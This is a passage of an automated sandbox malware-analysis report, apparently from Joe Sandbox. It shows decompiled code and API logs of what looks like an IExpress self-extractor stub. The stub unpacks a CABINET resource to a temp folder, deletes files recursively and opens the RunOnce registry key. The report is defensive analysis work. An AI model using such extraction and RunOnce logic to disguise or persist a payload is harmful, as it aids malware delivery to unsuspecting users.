					__imp__#20(E00074CA0, E00074CC0, E00074980, E00074A50, E00074AD0, E00074B60, E00074BC0, 1, 0x79148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x79148; // 0x0
						_t24 =  *0x78584; // 0x0
						E000744B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x71140, 0, E00074CD0, 0, 0x79140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x78584; // 0x0
					E000744B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x79140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x79140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x791d8; // 0x0
						if(_t47 == 0) {
							E000744B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x78a38 & 0x00000001) == 0 && ( *0x79a34 & 0x00000001) == 0) {
						SendMessageA( *0x78584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00074fe0
0x00074fe6
0x00074ff9
0x0007500d
0x00075013
0x0007501a
0x00075163
0x00075163
0x00075020
0x00075027
0x00075037
0x00075051
0x00075051
0x00075057
0x0007505e
0x000750a7
0x000750ad
0x000750b4
0x000750e8
0x000750e8
0x000750ee
0x000750ff
0x00075104
0x00075106
0x00000000
0x00075106
0x000750cd
0x000750d3
0x000750da
0x00000000
0x00000000
0x000750dd
0x000750e6
0x00000000
0x00000000
0x00000000
0x00075060
0x00075060
0x00075070
0x00075075
0x00075107
0x00075107
0x0007510e
0x00075111
0x00075117
0x00075117
0x0007511f
0x00075121
0x00075127
0x00075135
0x00075135
0x00075127
0x00075141
0x00075159
0x00075159
0x00000000
0x0007515f

APIs

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00074FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00075006
LockResource.KERNEL32(00000000), ref: 0007500D
GetDlgItem.USER32(00000000,00000842), ref: 00075030
ShowWindow.USER32(00000000), ref: 00075037
GetDlgItem.USER32(00000841,00000005), ref: 0007504A
ShowWindow.USER32(00000000), ref: 00075051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00075111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00075159

Strings

CABINET, xrefs: 00074FE6, 00074FF7
*MEMCAB, xrefs: 000750C7

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: f99cb948d14ac28b7d829a9d6ee8d4d081581c57afbd11bcc97eb34c56301c31
Instruction ID: 28a6f1d4fa568e760331413330ba2a72cb187ef082d426d426b72e1b136e22e6
Opcode Fuzzy Hash: f99cb948d14ac28b7d829a9d6ee8d4d081581c57afbd11bcc97eb34c56301c31
Instruction Fuzzy Hash: 233107B0F80701BFF7605B61AC8DFAB369CA745756F44C024BA0DB61E1DBBC8C808669

Uniqueness

Uniqueness Score: -1.00%

Function 00072F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00072F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x78004; // 0xdaa0d862
				_v8 = _t9 ^ _t46;
				if( *0x78a38 != 0) {
					L5:
					_t11 = E00075164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00076CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E000755A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0007658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x7a288("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x78a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x78a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x78d48 & 0x000000c0;
									if(( *0x78d48 & 0x000000c0) == 0) {
										_t41 =  *0x79a40; // 0x3, executed
										_t26 = E0007256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x78a24; // 0x0
									 *0x79a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x78a38;
										if( *0x78a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00074169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x79a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00073BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x78a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00073B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E000744B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x79124 = E00076285();
							goto L16;
						}
						_t59 =  *0x79a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0007621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x78a24;
				if( *0x78a24 != 0) {
					L4:
					_t34 = E00073A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E000751E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x78a38;
				if( *0x78a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00072f1d
0x00072f28
0x00072f2f
0x00072f3d
0x00072f6c
0x00072f6c
0x00072f71
0x00072f73
0x00073041
0x00073041
0x00073043
0x00073053
0x00073053
0x00072f79
0x00072f80
0x00000000
0x00072f86
0x00072f86
0x00072f93
0x00072f9e
0x00072fa0
0x00072fa6
0x00072fb8
0x00072fba
0x00072fbe
0x00072fc6
0x00072fcc
0x00072fd4
0x00072fd6
0x00072fd8
0x00072fe0
0x00072fe6
0x00072fee
0x00072ff0
0x00072ff5
0x00072ff5
0x00072fee
0x00072fd4
0x00072ff8
0x00072ffe
0x00073004
0x00073017
0x0007301c
0x00073024
0x00073054
0x0007305a
0x00073065
0x00073065
0x0007306c
0x0007306e
0x00073075
0x0007307a
0x0007307a
0x0007307c
0x00073081
0x00073087
0x00073089
0x000730a1
0x000730a1
0x000730a9
0x000730ab
0x000730ad
0x000730af
0x000730af
0x000730ad
0x000730b6
0x00000000
0x0007308b
0x0007308b
0x00073091
0x00000000
0x00000000
0x00073093
0x00073098
0x0007309a
0x00000000
0x00000000
0x0007309c
0x00000000
0x0007309c
0x00073089
0x0007305c
0x00073061
0x00073063
0x00000000
0x00000000
0x00000000
0x00073063
0x0007302b
0x00073032
0x0007303c
0x00000000
0x0007303c
0x00073006
0x0007300c
0x00000000
0x00000000
0x0007300e
0x00073015
0x00000000
0x00000000
0x00000000
0x00073015
0x00072f80
0x00072f3f
0x00072f46
0x00072f5f
0x00072f5f
0x00072f64
0x00072f66
0x00000000
0x00000000
0x00000000
0x00072f66
0x00072f4f
0x00000000
0x00000000
0x00072f55
0x00072f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00072F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00072FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00072FC6
DecryptFileA.ADVAPI32 ref: 00072FE6
FreeLibrary.KERNEL32(00000000), ref: 00072FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0007301C

Part of subcall function 000751E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00072F4D,?,00000002,00000000), ref: 00075201

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00072FDB, 00073017
advapi32.dll, xrefs: 00072F99
DecryptFileA, xrefs: 00072FC0

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-3123416969
Opcode ID: e867acb2dde97fa93cb0c47e656c48027c9ed1614ae3325b67abbce93685f002
Instruction ID: 45cac0968828d3ec6e77c1b331dafe566b54243415ccface97299437ec735140
Opcode Fuzzy Hash: e867acb2dde97fa93cb0c47e656c48027c9ed1614ae3325b67abbce93685f002
Instruction Fuzzy Hash: 7941C930E006459AFB70AB359C5969A33E8AB45751F10C075E94DD2192EF7CCEC0DBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00075467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00075467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x78004; // 0xdaa0d862
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x791e4;
					_t42 = 0x104;
					E00071680(0x791e4, 0x104);
					L14:
					_t13 = E000758C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x79124 = 0;
							_t14 = 1;
							L24:
							return E00076CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0007597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x78a20; // 0x0
						if(_t61 != 0) {
							 *0x78a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x79124 = E00076285();
						goto L22;
					}
					 *0x78a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E000753A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x791e4;
				E00071781(0x791e4, 0x104, __ecx,  &_v268);
				if(( *0x79a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0007658A(_t48, 0x104, 0x71140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0007658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00075472
0x00075479
0x00075481
0x00075484
0x0007551c
0x00075521
0x00075528
0x0007552d
0x0007552f
0x00075539
0x0007554d
0x0007554d
0x00075552
0x00075585
0x00075585
0x0007558b
0x0007558d
0x0007559d
0x0007559d
0x00075557
0x0007555e
0x00000000
0x00000000
0x00075560
0x00075566
0x00075569
0x0007556f
0x0007556f
0x00075581
0x00075581
0x00000000
0x00075581
0x00075545
0x0007557c
0x00000000
0x0007557c
0x00075547
0x00000000
0x00075547
0x0007548a
0x00075490
0x00075497
0x00000000
0x00000000
0x0007549d
0x000754ab
0x000754b4
0x000754c0
0x0007550c
0x00075511
0x00075515
0x00000000
0x00075515
0x000754c9
0x000754d6
0x000754d8
0x000754fe
0x00075503
0x00075507
0x00000000
0x00075507
0x000754da
0x000754dd
0x000754f7
0x00000000
0x000754f7
0x000754df
0x000754e2
0x000754f0
0x00000000
0x000754f0
0x000754e7
0x00000000
0x00000000
0x000754e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 000754C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0007553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0007556F

Part of subcall function 000753A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 000753FB
Part of subcall function 000753A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00075402
Part of subcall function 000753A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0007541F
Part of subcall function 000753A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0007542B
Part of subcall function 000753A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00075434

Strings

ppc, xrefs: 000754E9
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 0007547D, 00075481, 000754AB, 0007551C, 0007553C, 00075568
alpha, xrefs: 000754F0
mips, xrefs: 000754F7
i386, xrefs: 000754FE

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-3703068183
Opcode ID: 1022ea62e254f458f95923002df6cad7e31b40c3545205db4aaad7ef36e30b50
Instruction ID: bddd9f6598996fbb0d3c99bc71eb56870128464ba61a74d1cc962197fee2c958
Opcode Fuzzy Hash: 1022ea62e254f458f95923002df6cad7e31b40c3545205db4aaad7ef36e30b50
Instruction Fuzzy Hash: 6B313870F00E055BEB609B399C145FE73DAAB81302B04C02AA90E96581DAFC8E4186DD

Uniqueness

Uniqueness Score: -1.00%

Function 00072390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00072390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x78004; // 0xdaa0d862
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00076CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00071680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E000716B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00071680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E000716B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E000716B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0007658A( &_v280, 0x104, 0x71140);
								E00072390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00072398
0x0007239e
0x000723a3
0x000723a5
0x000723ae
0x000723b3
0x000724cb
0x000724d2
0x000724d3
0x000724d4
0x000724df
0x000723c2
0x000723d1
0x000723db
0x000723e4
0x000723f6
0x000723fc
0x00072401
0x00000000
0x00000000
0x00000000
0x00000000
0x00072407
0x00072407
0x00072408
0x00072411
0x0007241f
0x0007247a
0x00072483
0x00072495
0x000724a3
0x00072421
0x0007242f
0x00072453
0x0007245d
0x00072466
0x00072472
0x00072472
0x0007242f
0x000724af
0x000724b5
0x000724be
0x000724c5
0x00000000
0x000724c5

APIs

FindFirstFileA.KERNELBASE(?,00078A3A,000711F4,00078A3A,00000000,?,?), ref: 000723F6
lstrcmpA.KERNEL32(?,000711F8), ref: 00072427
lstrcmpA.KERNEL32(?,000711FC), ref: 0007243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00072495
DeleteFileA.KERNEL32(?), ref: 000724A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 000724AF
FindClose.KERNELBASE(00000000), ref: 000724BE
RemoveDirectoryA.KERNELBASE(00078A3A), ref: 000724C5

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 225c959a46d02cd2fda8a9075a0c231aa36c54ec50625b61e7bc5206fac1973f
Instruction ID: c826713ee535ad5bc3c2153a7be9fedd879c11f5150ce243c24fc4091114901b
Opcode Fuzzy Hash: 225c959a46d02cd2fda8a9075a0c231aa36c54ec50625b61e7bc5206fac1973f
Instruction Fuzzy Hash: 1131A431F047409BD320EBA8CC89AEF73ECABC5305F04892DB55D96291EB3C9949C796

Uniqueness

Uniqueness Score: -1.00%

Function 00072BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00072BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x7a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x79124 = 0;
				if(E00072CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00072F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E000752B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x78a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x79a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00071F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x78588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x79124; // 0x0
				return _t7;
			}

0x00072c03
0x00072c0d
0x00072c18
0x00072c20
0x00072c2e
0x00072c32
0x00072c36
0x00072c3d
0x00072c43
0x00072c45
0x00072c47
0x00072c49
0x00072c4e
0x00072c4e
0x00072c47
0x00072c32
0x00072c20
0x00072c50
0x00072c54
0x00072c57
0x00072c64
0x00072c66
0x00072c6b
0x00072c6d
0x00072c74
0x00072c76
0x00072c7c
0x00072c7e
0x00072c87
0x00072c89
0x00072c89
0x00072c87
0x00072c7c
0x00072c74
0x00072c8e
0x00072c95
0x00072c98
0x00072c98
0x00072c9e
0x00072ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00076BB0,00070000,00000000,00000002,0000000A), ref: 00072C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00076BB0,00070000,00000000,00000002,0000000A), ref: 00072C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00072C28
CloseHandle.KERNEL32(00000000,?,?,00076BB0,00070000,00000000,00000002,0000000A), ref: 00072C98

Strings

Kernel32.dll, xrefs: 00072C13
HeapSetInformation, xrefs: 00072C22

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 6b0f789e0abe51e633e495061d4e94c80f9de15a4ad5bd5ad8d82739acdb3929
Instruction ID: 8e59470888890815acdf356809550b9e43b61027fb7d06acec8315d5892b7570
Opcode Fuzzy Hash: 6b0f789e0abe51e633e495061d4e94c80f9de15a4ad5bd5ad8d82739acdb3929
Instruction Fuzzy Hash: 2111EC71F003455BF7116B759C49AAF3799DB94350B14C025F90CF3252DA3DEC91869D

Uniqueness

Uniqueness Score: -1.00%

Function 00076F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00076F40() {

				SetUnhandledExceptionFilter(E00076EF0); // executed
				return 0;
			}

0x00076f45
0x00076f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00076F45

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5d3fd6b6b7ca30b8909458de424a915f5c6be524811619a7cacfac640c5a83b2
Instruction ID: 37ca2ba7fc941795434bd60b7f8fc9449dec64ee361780cac615e0147155cabd
Opcode Fuzzy Hash: 5d3fd6b6b7ca30b8909458de424a915f5c6be524811619a7cacfac640c5a83b2
Instruction Fuzzy Hash: 22900264B5150047B6501B709D1945975915B8E612BC19460A11AD8494DB6D40809526

Uniqueness

Uniqueness Score: -1.00%

Function 0007202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0007202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x78004; // 0xdaa0d862
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00076CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
